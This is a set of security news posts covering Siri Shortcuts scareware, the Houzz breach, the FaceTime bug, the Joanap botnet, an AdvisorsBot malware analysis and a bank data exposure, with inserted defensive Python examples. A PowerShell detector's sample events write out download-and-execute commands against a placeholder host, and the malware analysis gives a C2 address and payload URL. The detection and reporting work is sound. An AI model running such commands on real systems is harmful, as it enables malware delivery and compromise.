Developers can present the shortcuts on the lock screen or in the 'search' field, based on time, location and context.

“The shortcut can then appear on the lock screen or in ‘search’ when it is deemed appropriate to show it to the user based on time, location and context.” continues the analysis.

“For example, a user approaches their usual coffee shop, and the relevant app pops up a shortcut on the screen to allow them to order the usual cup of java and pay for it on the app before they even enter the coffee shop.”


Experts at IBM explained that the new feature could be abused for malicious purposes such as scareware, a pseudo-ransom campaign that attempts to scare victims into paying the attackers by making them believe their data was stolen by hackers.

Attackers can use native Shortcut functionality to build a script that reads the ransom demand to the device’s owner using Siri’s voice. They can also automate data collection from the device (the user’s current physical address, IP address, clipboard contents, stored pictures and videos, contact information and more) and present it to the victim to make the threat convincing.

“To move the user to the ransom payment stage, the shortcut could automatically access the Internet, browsing to a URL that contains payment information via cryptocurrency wallets, and demand that the user pay-up or see their data deleted, or exposed on the Internet,” continues the post.

What makes this attack scenario more alarming is that the attacker could configure the malicious Shortcut to spread itself to the victim’s contact list, prompting potential new victims to download and install the malicious Shortcut.

IBM published a video PoC of the attack showing how a Shortcut can change the device’s brightness and volume, speak a ransom note that includes convincing personal details, turn the flashlight on and off while vibrating the device at the same time, display the spoken note in a written alert, and open the URL of a page containing payment information, in addition to spreading via messages to the user’s contacts.

“In our security research labs, we tested the ransom attack scenario. The shortcut we created was named ‘Ransom’ in the video, but it could easily be named any other name to entice users to run it. Lures, such as game cheats/hacking, unlocking secret functionality in apps, or getting free money, often entice users to tap on a shortcut and see where it leads,” explained John Kuhn, senior threat researcher at IBM Managed Security Services.

Siri Shortcuts open the door to a broad range of social engineering attacks; they could be abused to trick victims into installing any kind of malware on their devices.

Below are some recommendations shared by the experts:

  1. Never install a Shortcut from an untrusted source.
  2. Check the permissions that the shortcut is requesting and never give permission to portions of your phone you are not comfortable with. Things like photos, location and camera could be used to obtain sensitive information.
  3. Use the show actions button before installing a third-party shortcut to see the underlying actions the shortcut might take. Look for things like messaging data to numbers you don’t recognize, emailing data out, or making SSH server connections to servers.

Pierluigi Paganini

(SecurityAffairs – Siri Shortcuts, hacking)

The post IBM experts warn of malicious abuses of Apple Siri Shortcuts appeared first on Security Affairs.



Security Affairs: Home Design website Houzz suffered a data breach

The home remodeling and design platform Houzz informed customers that it suffered a data breach that exposed some personal information.

The popular home design platform Houzz has suffered a data breach that exposed some personal information.

Houzz has over 40 million monthly unique users; at the time of writing it is not clear how many individuals are affected.


The company learned in late December of an unauthorized access to its user data and started notifying its users.

The company discovered that a file containing user data was obtained by an “unauthorized third party.”

“Houzz recently learned that a file containing some of our user data was obtained by an unauthorized third party. The security of user data is our priority. We immediately launched an investigation and engaged with a leading forensics firm to assist in our investigation, containment, and remediation efforts. We have also notified law enforcement authorities.” reads the data breach notification published by the company.

“Out of an abundance of caution, we have notified all Houzz users who may have been affected.”

The company is investigating the issue to discover how the hackers obtained the data; it has notified law enforcement and hired a forensics firm to assist.

“Our security team has a number of ways to learn about potential security vulnerabilities, including our own active methods and third-party reporting.” continues the notification.

The file obtained by the unauthorized third party included information such as name, city, state, country, description, and also some internal identifiers used by Houzz systems.

The company revealed that the exposed data also included usernames, password hashes, IP addresses, and the user’s Facebook ID where the user signed in to the platform through Facebook.

Hackers did not access social security numbers or financial information.

The company suggests that users reset their password and revealed that it uses a unique salt for each password.

“You may reset your password at https://www.houzz.com/changePassword. Please note that in order to reset your password, you will need to have access to the email address that is associated with your Houzz profile.” continues the notification.

“We do not believe that any passwords were compromised because we do not actually store passwords except in a one-way encrypted form that is salted uniquely per user. However, we recommend changing your password on any other sites or accounts where you used the same login information that you used for Houzz. It is generally best practice to use a unique password for each service.”
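The point in the notification about storing passwords only in a one-way form that is salted uniquely per user is what limits the damage when a file of password hashes leaks: an attacker cannot precompute one table for all users, and two users with the same password do not end up with the same stored value. As an added example, not Houzz’s code and not a description of its actual scheme, the Python below stores a password as a per-user random salt plus a scrypt-derived digest, verifies a login in constant time, and shows that identical passwords produce unrelated records. The record format and the scrypt work factors are assumptions.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Constructed example (not Houzz's implementation): per-user salted,
# one-way password storage using scrypt and constant-time verification.
SALT_BYTES = 16
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1   # assumed work factors
DK_LEN = 32


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest). When no salt is given a fresh random one is drawn,
    so every user (and every password change) gets its own salt."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DK_LEN)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


def encode_record(password: str) -> str:
    """Serialise the parameters and salt next to the digest, the way a password
    table would store them (assumed format, modelled on crypt-style strings)."""
    salt, digest = hash_password(password)
    return "$".join(["scrypt", str(SCRYPT_N), str(SCRYPT_R), str(SCRYPT_P),
                     salt.hex(), digest.hex()])


def verify_record(password: str, record: str) -> bool:
    """Parse a stored record and verify a login attempt against it."""
    try:
        algo, n, r, p, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False                      # malformed record
    if algo != "scrypt":
        return False
    salt, digest = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
    candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                               n=int(n), r=int(r), p=int(p), dklen=len(digest))
    return hmac.compare_digest(candidate, digest)


def same_password_different_records(password: str) -> bool:
    """Two users who chose the same password get unrelated salts and digests,
    so one leaked record reveals nothing about the other."""
    s1, d1 = hash_password(password)
    s2, d2 = hash_password(password)
    return s1 != s2 and d1 != d2


if __name__ == "__main__":
    rec = encode_record("correct horse battery staple")
    print(rec)
    print(verify_record("correct horse battery staple", rec))   # True
    print(same_password_different_records("hunter2"))           # True
```

Keeping the work factors inside the record, as above, lets a service raise them later and re-hash each user on their next successful login without a flag day; the per-user salt is what forces an attacker who obtains the file to attack every record separately.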

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Home Design website Houzz suffered a data breach appeared first on Security Affairs.



Apple issued a partial fix for recent FaceTime spying bug

On Friday, Apple announced that the FaceTime issue recently discovered has been partially fixed, the company plans to release a complete update next week.

This week, Apple issued a partial fix for the FaceTime issue recently discovered, the tech giant plans to release a complete update next week.

Apple experts implemented a server-side patch, but the Group FaceTime feature will be enabled again next week.

The security vulnerability in Apple’s FaceTime let a caller hear the audio of the person they were calling before that person picked up, simply by adding the caller’s own number to a group call.

On the receiver’s side, it appears as if the call still hasn’t been answered.

The bug was discovered by Grant Thompson, a 14-year-old from Arizona, who attempted to report the flaw to Apple for more than 10 days without success.

“There’s a major bug in FaceTime right now that lets you connect to someone and hear their audio without the person even accepting the call.” reads a thread published on MacRumors.  

“This bug is making the rounds on social media, and as 9to5Mac points out, there are major privacy concerns involved. You can force a FaceTime call with someone and hear what they’re saying, perhaps even without their knowledge. 

We tested the bug at MacRumors and were able to initiate a FaceTime call with each other where we could hear the person on the other end without ever having pressed the button to accept the call.”

The flaw affected iOS 12.1 and 12.2 versions, and macOS Mojave.


Just after the bug was disclosed, Apple suspended the Group FaceTime feature.

Apple has officially thanked Thompson for reporting the bug and apologized for the delay in acting on the report. The company has promised to improve its process for receiving reports such as the one about the FaceTime issue.

“We sincerely apologize to our customers who were affected and all who were concerned about this security issue. We appreciate everyone’s patience as we complete this process,” reads the statement issued by Apple.

“We want to assure our customers that as soon as our engineering team became aware of the details necessary to reproduce the bug, they quickly disabled Group FaceTime and began work on the fix.”

New York Governor Andrew M. Cuomo and Attorney General Letitia James announced a probe into Apple’s failure to warn customers about the flaw and the delay in responding to the report.

“In the wake of this egregious bug that put the privacy of New Yorkers at risk, I support this investigation by the Attorney General into this serious consumer rights issue and direct the Division of Consumer Protection to help in any way possible,” Governor Cuomo announced. “We need a full accounting of the facts to confirm businesses are abiding by New York consumer protection laws and to help make sure this type of privacy breach does not happen again.”

“This FaceTime breach is a serious threat to the security and privacy of the millions of New Yorkers who have put their trust in Apple and its products over the years.” said Attorney General James.

“My office will be conducting a thorough investigation into Apple’s response to the situation, and will evaluate the company’s actions in relation to the laws set forth by the State of New York. We must use every tool at our disposal to ensure that consumers are always protected.”

Pierluigi Paganini

(SecurityAffairs – FaceTime bug, privacy)

The post Apple issued a partial fix for recent FaceTime spying bug appeared first on Security Affairs.

Security Affairs: US authorities aim to dismantle North Korea’s Joanap Botnet

FBI and Air Force experts are sinkholing the Joanap botnet to collect information about it and dismantle the malicious infrastructure.

The U.S. Justice Department has declared war on the Joanap botnet, which is associated with North Korea.

The U.S. DoJ announced this week that it is working to dismantle the infamous Joanap botnet, a malicious infrastructure that is believed to be associated with Pyongyang.

The FBI and the U.S. Air Force Office of Special Investigations (AFOSI) obtained court orders and search warrants that allow them to conduct sinkholing of the Joanap botnet.

Joanap is a remote access trojan (RAT) that allows the attackers to exfiltrate data from compromised systems; it supports many commands and is also able to drop additional payloads.

The authorities set up servers that mimic the botnet’s communication system in order to collect information on infected systems and share it with ISPs and the owners of the compromised computers.

The U.S. authorities will also inform foreign victims through the FBI’s Legal Attachés, who work with the law enforcement and security agencies in their countries.

The Joanap botnet has been around since 2009, and experts pointed out that the threat is still spreading through unpatched systems and unprotected networks. The bot is delivered by the Brambul SMB worm, which spreads through a network by brute-forcing SMB shares using a list of hard-coded credentials.
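Brambul’s propagation method, as described above, leaves a recognisable trace on Windows hosts: a burst of failed network logons (Security event 4625 with logon type 3, which is what SMB authentication produces) from one source against several account names in a short time, sometimes followed by a successful logon (4624) once a credential from the list works. The following Python is an added example, not code from the DoJ, the FBI or any vendor report cited here; it runs a simple burst detector over constructed, simplified log lines (the field layout and the IP addresses are assumptions, not real telemetry).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample log lines (not real telemetry). The layout is a simplified
# rendering of Windows Security events: 4625 = failed logon, 4624 = successful
# logon; LogonType=3 is a network logon, which is what SMB authentication yields.
SAMPLE_LOG = """\
2019-01-30T10:00:01 EventID=4625 LogonType=3 TargetUserName=Administrator IpAddress=10.0.0.25
2019-01-30T10:00:02 EventID=4625 LogonType=3 TargetUserName=admin IpAddress=10.0.0.25
2019-01-30T10:00:03 EventID=4625 LogonType=3 TargetUserName=root IpAddress=10.0.0.25
2019-01-30T10:00:04 EventID=4625 LogonType=3 TargetUserName=guest IpAddress=10.0.0.25
2019-01-30T10:00:05 EventID=4625 LogonType=3 TargetUserName=backup IpAddress=10.0.0.25
2019-01-30T10:00:06 EventID=4624 LogonType=3 TargetUserName=backup IpAddress=10.0.0.25
2019-01-30T10:05:00 EventID=4625 LogonType=3 TargetUserName=alice IpAddress=10.0.0.77
2019-01-30T10:20:00 EventID=4625 LogonType=3 TargetUserName=alice IpAddress=10.0.0.77
2019-01-30T10:00:10 EventID=4625 LogonType=2 TargetUserName=bob IpAddress=127.0.0.1
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)


def parse_events(text: str) -> List[Dict]:
    """Turn the simplified log lines into event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "eid": int(m["eid"]),
            "logon_type": int(m["lt"]),
            "user": m["user"],
            "ip": m["ip"],
        })
    return events


def detect_smb_bruteforce(events: List[Dict], window: timedelta = timedelta(seconds=60),
                          min_failures: int = 5, min_users: int = 3) -> List[Dict]:
    """Flag a source that produces many failed network logons against several
    account names inside one window, the signature of a worm walking a
    hard-coded credential list. A 4624 from the same source inside the window
    means a credential on the list worked, so the alert is marked for priority."""
    by_ip: Dict[str, List[Dict]] = defaultdict(list)
    for ev in events:
        if ev["logon_type"] == 3:          # SMB shows up as network logons
            by_ip[ev["ip"]].append(ev)

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["eid"] == 4625]
        for i, first in enumerate(failures):
            end = first["ts"] + window
            burst = [e for e in failures[i:] if e["ts"] <= end]
            users = {e["user"] for e in burst}
            if len(burst) >= min_failures and len(users) >= min_users:
                success = any(e["eid"] == 4624 and first["ts"] <= e["ts"] <= end
                              for e in evs)
                alerts.append({"ip": ip, "first_seen": first["ts"].isoformat(),
                               "failures": len(burst), "distinct_users": len(users),
                               "success_after_burst": success})
                break                      # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_bruteforce(parse_events(SAMPLE_LOG)):
        print(alert)
```

On the constructed input only 10.0.0.25 is flagged: five failures against five different names within five seconds, followed by a success, which is the case an analyst wants at the top of the queue. The two failures from 10.0.0.77 fifteen minutes apart against one name stay below the threshold, and the interactive (logon type 2) failure is not counted at all, which keeps ordinary mistyped passwords out of the alert.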

Experts linked both the Joanap and Brambul malware to the North Korea-linked Hidden Cobra APT group.

The Joanap bot infected systems in many industries, including media, aerospace, financial, and critical infrastructure sectors across the world.

“Computers around the world remain infected by a botnet associated with the North Korean Regime,” said Assistant Attorney General John Demers. “Through this operation, we are working to eradicate the threat that North Korea state hackers pose to the confidentiality, integrity, and availability of data. This operation is another example of the Justice Department’s efforts to use every tool at our disposal to disrupt national security threat actors, including, but by no means limited to, prosecution.”

“Through technical means and legal process, the FBI continually seeks to disrupt the malicious cyber activities of North Korean cybercriminals, as in this case, and all cyber actors who pose a threat to the United States and our international partners.” explained ADIC Paul Delacourt.

In June 2018, the FBI filed a complaint against the North Korean citizen Park Jin Hyok, an expert who works for the North Korean military intelligence agency, the Reconnaissance General Bureau (RGB).

The man, also known as Pak Jin Hek, is also linked to the dreaded Lazarus APT group; according to the authorities he was involved in numerous computer intrusions in which he also used the Brambul malware to gain unauthorized access to computers.

“Moreover, a complaint was filed on June 8, 2018, charging Park Jin Hyok with a conspiracy to carry out numerous computer intrusions backed by the North Korean government. That complaint alleged how co-conspirators used Brambul to gain unauthorized access to computers, and then used those computers to carry out the charged malicious cyber activities. The Brambul worm itself was recovered from the computer networks of some victims of the conspiracy.”

The good news for users is that Joanap is not effective against up-to-date Microsoft Windows systems running Windows Defender and using Windows Update. Most antivirus programs are also able to detect both Joanap and Brambul.

Pierluigi Paganini

(SecurityAffairs – Joanap botnet, North Korea)

The post US authorities aim to dismantle North Korea’s Joanap Botnet appeared first on Security Affairs.



Security Affairs: The return of the AdvisorsBot malware

Security experts at Cybaze-Yoroi ZLab have analyzed a new sample of the AdvisorsBot malware, a downloader that was first spotted in August 2018.

As usual, the malware arrives as a seemingly legitimate e-mail attachment named “invoice.doc”. Today, weaponized Microsoft Office documents with macros are one of the most common and most effective methods to deliver malware, because they rely only on simple social engineering tricks to lure users into enabling the macros.

The following figure shows the workflow of the infection chain:

Figure 1 – Malware’s workflow

Technical analysis

Hash (SHA-256): a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
Threat: Dropper
Brief: invoice(7).doc
ssdeep: 3072:tg919RZTg8X+H4u7sFYv3Rtf7XZ7PE1MbXEy271G5FZy+1OhV5biqb09H/TrN1Wk:8iqYph1Q5O3

Table 1 –   Dropper information

Hash (SHA-256): 62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
Threat: PowerShell script
Brief: okzjtag.png (dropper/payload)
ssdeep: 192:I6P2ZF0tX6vYhscXNtP++l3p2RwPNtOZE9yHPKR4EJxT/7MZUJn7rW0v:I6P+F4ac3aRwP7d9Ic4EJxT/gZEXWq

Table 2 – Fake PNG, powershell script information

Once opened, the document kindly asks the user to enable the macro scripts, which are heavily obfuscated to avoid static detection.

Figure 2 – Document view inviting to enable macro

The macro code downloads a text string through a WebClient object invoked from the PowerShell console, saves it with a .png file extension and runs it through the “iex” primitive.

Figure 3 – Piece of VBS script that starts malware infection

This script contains several base64-encoded chunks of data, as shown in the following figure.

Figure 4 – Piece of code in Base64 encoded inside fake PNG image

The deobfuscation of the first chunk reveals the IP address of the C2. This address is the same one used to download the whole script.

Figure 5 – Deobfuscated C2’s IP

The second piece of script, labeled “$jdH9C”, is a compressed GzipStream object. After decoding it, we noticed that an executable file is stored within the memory stream:

Figure 6 – DLL hardcoded inside fake PNG script

The analysis of this binary is reported in the next paragraph (see “DLL Analysis”). 

The last base64 chunk is directly executed through the “iex” primitive. It is interesting to notice that it calls some “non-library” functions, that is, functions loaded from the previously referenced DLL file.
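The three kinds of chunk described above (a text chunk carrying the C2 address, a GzipStream-compressed chunk holding an executable, and a chunk handed straight to iex) can be separated with a short static triage script, which is how an analyst gets to Figures 5 and 6 without running anything. The following Python is an added example, not code from Cybaze-Yoroi ZLab and not the malware itself; it runs on a constructed stand-in for the fake PNG script (the variable names, the placeholder address 203.0.113.10 and the dummy PE bytes are assumptions, not the real sample), finds the base64 literals, decodes each one, recognises the gzip magic and the MZ header, and pulls any IP address out of the textual chunks.

```python
import base64
import gzip
import re
import string
import zlib
from typing import Dict, List

# Constructed stand-in for the "fake PNG" PowerShell script (not the real
# sample): a text chunk with a placeholder download address, a gzip-compressed
# chunk holding dummy PE bytes, and a chunk handed straight to iex.
_FAKE_PE = (b"MZ" + b"\x90" * 62
            + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 200)


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


SAMPLE_SCRIPT = (
    "$u7Kq = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
    + _b64(b"http://203.0.113.10/okzjtag.png") + "'))\n"
    "$jdH9C = [Convert]::FromBase64String('" + _b64(gzip.compress(_FAKE_PE)) + "')\n"
    "$ms = New-Object IO.MemoryStream(,$jdH9C)\n"
    "$gz = New-Object IO.Compression.GzipStream($ms, [IO.Compression.CompressionMode]::Decompress)\n"
    "iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
    + _b64(b"Write-Host 'stage three placeholder'") + "')))\n"
)

B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")      # long base64-looking literals
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
GZIP_MAGIC = b"\x1f\x8b"


def _is_text(data: bytes) -> bool:
    try:
        return all(ch in string.printable for ch in data.decode("utf-8"))
    except UnicodeDecodeError:
        return False


def classify_chunk(raw: bytes) -> Dict:
    """Classify one decoded chunk: gunzip it if it carries the gzip magic, then
    check for an MZ header (embedded executable) or readable text (URLs, IPs)."""
    info = {"kind": "binary", "size": len(raw), "gzip": False, "pe": False,
            "ips": [], "text": None}
    payload = raw
    if raw.startswith(GZIP_MAGIC):
        info["gzip"] = True
        try:
            payload = gzip.decompress(raw)
        except (OSError, EOFError, zlib.error):
            return info                      # truncated stream: report what we know
        info["size"] = len(payload)
    if payload.startswith(b"MZ"):
        info["kind"], info["pe"] = "pe", True
    elif _is_text(payload):
        info["kind"] = "text"
        info["text"] = payload.decode("utf-8")
        info["ips"] = IP_RE.findall(info["text"])
    return info


def triage_script(script: str) -> List[Dict]:
    """Find every base64 literal in the script and classify it in order."""
    results = []
    for m in B64_RE.finditer(script):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:                   # not really base64 (e.g. a long identifier)
            continue
        info = classify_chunk(raw)
        info["offset"] = m.start()
        results.append(info)
    return results


if __name__ == "__main__":
    for chunk in triage_script(SAMPLE_SCRIPT):
        print(chunk["offset"], chunk["kind"], chunk["size"], chunk["gzip"], chunk["ips"])
```

The gzip branch matters because the compressed chunk would otherwise be reported as opaque binary; decompressing first is what exposes the MZ header. The extracted text chunks are where the download address and the iex-executed stage live, so anything that decodes as printable text is worth reading before the binary is sent to a disassembler.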

Within this script, we noticed a routine named “nvtTvqn” that gathers information about the victim machine.

Figure 7 – System information stolen by the malware

It retrieves:

  1. System Info;
  2. Computer IP address;
  3. Network status;
  4. List of running processes;
  5. Available privileges;
  6. Usernames;
  7. Domain Admins;
  8. Files on the desktop;
  9. Antivirus products installed on the computer.

Another interesting function is “j2aYhH”:

Figure 8 – Accounts and emails stealing

This function searches for all the email accounts registered on the victim machine. Inside its code another routine named “CR1Z” is referenced; this one checks whether the Outlook client is installed.

Figure 9 – Registry key searched by the malware

DLL Analysis

As described in the previous paragraph, the PowerShell script uses functions exported from the executable.

Hash (SHA-256): 5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0
Threat: Malware payload containing some malicious functions invoked by the PowerShell script
Brief: *.dll file (Payload)
ssdeep: 96:+8irQu26Iu2X/lZxvXZ31n2G1QmAPuvEHNeSPKw+1sxXt/WxJtMkQRO7j+gqT:+PRoViGOmFvEHNeSCp1sxdumkQbl

Table 3 – DLL information

The file is a dynamic-link library that was not yet known to the major security platforms.

Figure 10 – DLL results on VirusTotal

The library contains MSIL code running on top of the .NET Framework, so recovering its source code with a decompiler is straightforward.

Figure 11 – Static analysis on DLL

The extracted code contains utility functions used for many purposes, for instance to generate a pseudo-random installation path.

Figure 12 – Source code of function in DLL

The “kaYchi” function, instead, accepts three parameters (id, status and post) and creates files with two different extensions: “*.asp” if the “post” variable is true and “*.jpg” otherwise.

Figure 13 – Function to generate .asp or .jpg file to write/send victim information to C2

The remote command and control server (162.244.32.180) was down at the time of writing. After the steps described above, the malware tries to download further components from it and to execute them through the “iex” primitive.

The last DNS activity dates to December 2018. This IP address is already known to the security community and labeled as malicious; it is located in the US, as visible in the following figures.

Figure 14 – DNS history of the C2
Figure 15 – C2 relation graph

The domain zosmogroel.com was active until 18 December 2018; we also found an associated certificate with the SHA-1 fingerprint 98b637715fa6429a60eed9b58447e967bf7e1018.

Figure 16 – zosmogroel.com certificate

This certificate fingerprint was associated with more than 80 IP addresses; further analysis revealed that some of those IPs have been used as drop URLs for other malware samples.

The analyzed sample is AdvisorsBot, first analyzed by Proofpoint on 23 August 2018. We also found evidence on a public sandbox that last August the same remote C2, 162.244.32.180, delivered an Ursnif/Gozi variant from 162.244.32.180/yak0810.exe, with SHA-256 030531a784f72f145bef98a3240283da88fe623904c066be179fbbe3a9150c48, as also confirmed by signatures on VirusTotal. This last piece of evidence suggests that the infrastructure was used to deliver different malware families.

Conclusions

Weaponized Microsoft Office documents delivered via e-mail are the top infection vector in today’s malware landscape; in second place we find the abuse of the Microsoft DDE protocol and of Office exploits such as CVE-2017-11882 (the Equation Editor memory-corruption flaw). One reason is that macro malware very often does not rely on expensive-to-deploy 0-day exploits and can still bypass endpoint security solutions (macros are often whitelisted in enterprise environments) thanks to extensive multi-layered obfuscation, mainly in PowerShell; broadly speaking, it has a very low barrier to entry.
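Because the chain uses no exploit and the files are obfuscated, it is usually caught on behaviour rather than on file signatures. The following added example (written for this page, not part of the Yoroi analysis or of any vendor rule set) scores process-creation events for the Office-to-PowerShell download-and-execute pattern, expanding -EncodedCommand payloads before matching; the events, field names, process IDs and 192.0.2.10 URLs are constructed, and the weights and threshold are an assumption to tune.

```python
"""Added detection example for the macro -> PowerShell -> download/iex chain.
Not from the Yoroi analysis or any vendor rule set: the events below are
constructed in the shape of Sysmon Event ID 1 fields, the PIDs and 192.0.2.10
URLs are made up, and the weights/threshold are an assumption to tune."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPECT_TOKENS = {
    "download": re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest", re.I),
    "execute":  re.compile(r"invoke-expression|\biex\b", re.I),
    "stealth":  re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.I),
    "encoded":  ENCODED_ARG,
    "unpack":   re.compile(r"frombase64string|gzipstream", re.I),
}
ALERT_THRESHOLD = 4   # assumption: two weak signals, or any Office parent, raise an alert


@dataclass
class Finding:
    pid: int
    score: int
    reasons: List[str]


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (Base64 of UTF-16LE, not
    ASCII) so token matching sees what PowerShell will actually run."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} ## decoded: {decoded}"


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> Optional[Finding]:
    """Score one process-creation event; None when it is not PowerShell or
    stays under the threshold."""
    if _basename(ev["Image"]) not in PS_IMAGES:
        return None
    cmd = decode_encoded_command(ev["CommandLine"])
    reasons, score = [], 0
    if _basename(ev["ParentImage"]) in OFFICE_PARENTS:
        reasons.append("office-parent")
        score += ALERT_THRESHOLD       # Office spawning PowerShell alerts on its own
    for name, rx in SUSPECT_TOKENS.items():
        if rx.search(cmd):
            reasons.append(name)
            score += 2
    return Finding(ev["ProcessId"], score, reasons) if score >= ALERT_THRESHOLD else None


def run(events: List[dict]) -> List[Finding]:
    return [f for f in (score_event(e) for e in events) if f]


def _enc(ps: str) -> str:
    """Encode a command the way 'powershell -enc' expects it (for the sample)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessId": 4412, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://192.0.2.10/images/okzjtag.png\')"'},
    {"ProcessId": 5120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NonI -NoP -Enc " + _enc("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.png')")},
    {"ProcessId": 6001, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoP -File C:\scripts\nightly-backup.ps1"},
    {"ProcessId": 6002, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for f in run(SAMPLE_EVENTS):
        print(f"pid={f.pid} score={f.score} reasons={','.join(f.reasons)}")
```

The third event (a scheduled backup launched with -NoProfile) stays below the threshold on purpose: a single stealth switch is common in legitimate automation, and an Office parent or a download-plus-execute pair is what separates the dropper from it.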

Several APTs today use spear-phishing e-mails with a weaponized Office document as an attachment. To name a few: the OilRig APT used BondUpdater in a campaign, discovered by FireEye in 2017, that targeted a Middle Eastern governmental organization with a malicious VBA macro downloading a two-stage PowerShell payload.

A similar vector was used in a recent APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE). The attackers did not use any zero-day vulnerability in this campaign; instead, they relied on weaponized Office documents containing VBA scripts to deliver a new variant of Seduploader. The Turla APT also used weaponized documents in recent campaigns to deliver KopiLuwak, a heavily obfuscated JavaScript payload.

This sample shows a high level of obfuscation to defeat antivirus and does not use any exploit; in fact, the obfuscated DLL component was not flagged on VirusTotal (0/60) at the time of writing. Unfortunately we cannot carry on the analysis because the C2 is no longer reachable, but we noticed that the last DNS activity dates to December 2018, with the registration of two distinct domains each active for one week (and several domains before them). This suggests that the malware was developed for target-specific operations, keeping the exposure window of each domain to a minimum. Further analysis of these registered domains suggests that the infrastructure is large (88 IPs found) and that it may also have been used to deliver other malware.

Researchers at Cybaze-Yoroi ZLAB advise disabling macros by default and checking the origin of e-mails in depth.

Further details, including IoCs and Yara rules, are reported in the analysis published by Yoroi:

https://blog.yoroi.company/research/the-return-of-advisorsbot/

Pierluigi Paganini

(SecurityAffairs – AdvisorsBot, malware)

The post The return of the AdvisorsBot malware appeared first on Security Affairs.

Security Affairs: State Bank of India left archive with millions of Customer messages exposed

Another data breach made the headlines, this time the victim is the State Bank of India that left a database containing personal information exposed online.

The State Bank of India (SBI) left a database containing customers’ personal information exposed online without any protection.

The discovery was made by an anonymous security researcher who found a server used for the bank’s Quick service, a mobile-based information service. Quick is “a free service from the Bank where in you can get your Account Balance, Mini Statement and more just by giving a Missed Call or sending an SMS with pre-defined keywords to pre-defined mobile numbers from your registered mobile number.”

The database was exposed online without a password: anyone who located it could access the plaintext information it contained.

The archive contained millions of text messages, going back to December, that the bank exchanged with its customers. The exposed data included the customer’s phone number, partial bank account number, bank balance and records of transactions.

The good news is that the State Bank of India fixed the issue within hours of being informed of the problem; unfortunately, it is not known how long the data remained exposed online or whether threat actors accessed the huge trove of information.

The availability of this information poses a serious risk to bank customers: threat actors could use it to target them directly.

Pierluigi Paganini

(SecurityAffairs – data breach, State Bank of India)

The post State Bank of India left archive with millions of Customer messages exposed appeared first on Security Affairs.

Facebook dismantled a vast manipulation campaign tied to Iran

Facebook took down hundreds of fake accounts from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

Facebook took down 783 inauthentic pages, groups and accounts tied to Iran that were involved in a vast manipulation campaign active in more than 20 countries.

“The world’s biggest social network said it removed 783 pages, groups and accounts ‘for engaging in coordinated inauthentic behavior tied to Iran.’” reported AFP.

